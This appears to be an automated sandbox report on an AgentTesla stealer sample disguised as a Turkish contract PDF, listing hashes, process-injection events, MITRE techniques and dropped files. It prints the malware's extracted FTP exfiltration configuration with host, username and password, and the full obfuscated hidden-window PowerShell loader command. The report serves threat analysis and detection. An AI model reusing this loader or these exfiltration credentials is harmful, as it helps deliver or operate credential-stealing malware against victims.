agenttesla | 51f63b8248b7719fb54a6205d260a63077421f6acce4608fffc57dd081f3d2e5

General

Target

SÖZLEŞME FORMU-pdf.bat.exe
Size

861KB
MD5

12e8a5c51d703480287ece311eccf19f
SHA1

e8a24456acca0940bfa2c20b2b1955c479a7de80
SHA256

51f63b8248b7719fb54a6205d260a63077421f6acce4608fffc57dd081f3d2e5
SHA512

b369b54ab8433d963933603a556e177cad0d603a2a527f8ca0c2516520ae9cdf66d400f9595c66ef111badd4d8172be9d452ec1d5b67c26ad6f5086da5d88e4b
SSDEEP

12288:0cAw7NoOLMYUy9ykwdEmU9E+/BZEHCkg8Ta51XzK5olKV6:0Uw0UAEdgcmxzK5oD

Score

10^/10

agenttesla execution keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: ftp
Host:
ftp://ftp.piny.ro
Port:
21
Username:
[email protected]
Password:
playingboyz231

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1612	powershell.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2428	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1612	powershell.exe
2428	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1612 set thread context of 2428	1612	powershell.exe	32

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
1612	powershell.exe
1612	powershell.exe
1612	powershell.exe
1612	powershell.exe
1612	powershell.exe
1612	powershell.exe
2428	wab.exe
2428	wab.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1612	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1612	powershell.exe
Token: SeDebugPrivilege	2428	wab.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 2188 wrote to memory of 1612	2188	SÖZLEŞME FORMU-pdf.bat.exe	28
PID 2188 wrote to memory of 1612	2188	SÖZLEŞME FORMU-pdf.bat.exe	28
PID 2188 wrote to memory of 1612	2188	SÖZLEŞME FORMU-pdf.bat.exe	28
PID 2188 wrote to memory of 1612	2188	SÖZLEŞME FORMU-pdf.bat.exe	28
PID 1612 wrote to memory of 2608	1612	powershell.exe	30
PID 1612 wrote to memory of 2608	1612	powershell.exe	30
PID 1612 wrote to memory of 2608	1612	powershell.exe	30
PID 1612 wrote to memory of 2608	1612	powershell.exe	30
PID 1612 wrote to memory of 2428	1612	powershell.exe	32
PID 1612 wrote to memory of 2428	1612	powershell.exe	32
PID 1612 wrote to memory of 2428	1612	powershell.exe	32
PID 1612 wrote to memory of 2428	1612	powershell.exe	32
PID 1612 wrote to memory of 2428	1612	powershell.exe	32
PID 1612 wrote to memory of 2428	1612	powershell.exe	32

C:\Users\Admin\AppData\Local\Temp\SÖZLEŞME FORMU-pdf.bat.exe
"C:\Users\Admin\AppData\Local\Temp\SÖZLEŞME FORMU-pdf.bat.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2188
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -windowstyle hidden "$Gestalte=cat 'C:\Users\Admin\AppData\Local\Temp\Landsforrderes\Bilge.Rek';$Shapy=$Gestalte.substring(78840,3);.$Shapy($Gestalte)"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1612
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
    3⤵
    PID:2608
- - C:\Program Files (x86)\windows mail\wab.exe
    "C:\Program Files (x86)\windows mail\wab.exe"
    3⤵
    - Suspicious use of NtCreateThreadExHideFromDebugger
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2428

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Landsforrderes\Bilge.Rek

Filesize
77KB

MD5
03355270674c4be3bf38bb1c56468d09

SHA1
9de14dfd8cd5292c917e19aedb40fb69d27f253e

SHA256
41032364e0d45cb5c2841a51435a466b12503a93fc0700ac28ca685b342a7baa

SHA512
e6b428b9071c79f76dbbe9dc3cf80e2134d022c1b1e075790517aa7554f12672ba0eb27e2f9a3be472c0b7da54f89d90d24eaa40d7041d57774f5bef6999a0ae

Download Submit
C:\Users\Admin\AppData\Local\Temp\Landsforrderes\Sproggenier.Gob

Filesize
343KB

MD5
532236b2c4e8a1d9212d67d7ab721ca4

SHA1
3893bd51f0a71ebc472b67cc7d0863acd3bdfec2

SHA256
e35290cd21e48370602f4d4ce634c74eb72f26235dce5d270e52befd23b75b5c

SHA512
90f6f60f557a2e885e841276185374ff0438928a24b2dae1e4a0867566c937e15486b22407c1c305e66e540be5266efa1b35ddb4ae1bbb49480cb760925b91a3

Download Submit
memory/1612-10-0x0000000073C31000-0x0000000073C32000-memory.dmp

Filesize
4KB

Download
memory/1612-11-0x0000000073C30000-0x00000000741DB000-memory.dmp

Filesize
5.7MB

Download
memory/1612-12-0x0000000073C30000-0x00000000741DB000-memory.dmp

Filesize
5.7MB

Download
memory/1612-13-0x0000000073C30000-0x00000000741DB000-memory.dmp

Filesize
5.7MB

Download
memory/1612-14-0x0000000073C30000-0x00000000741DB000-memory.dmp

Filesize
5.7MB

Download
memory/1612-17-0x0000000006680000-0x000000000BB24000-memory.dmp

Filesize
84.6MB

Download
memory/1612-18-0x0000000073C30000-0x00000000741DB000-memory.dmp

Filesize
5.7MB

Download
memory/2428-19-0x0000000000FF0000-0x0000000002052000-memory.dmp

Filesize
16.4MB

Download
memory/2428-20-0x0000000000FF0000-0x0000000001032000-memory.dmp

Filesize
264KB

Download

Analysis

Sharing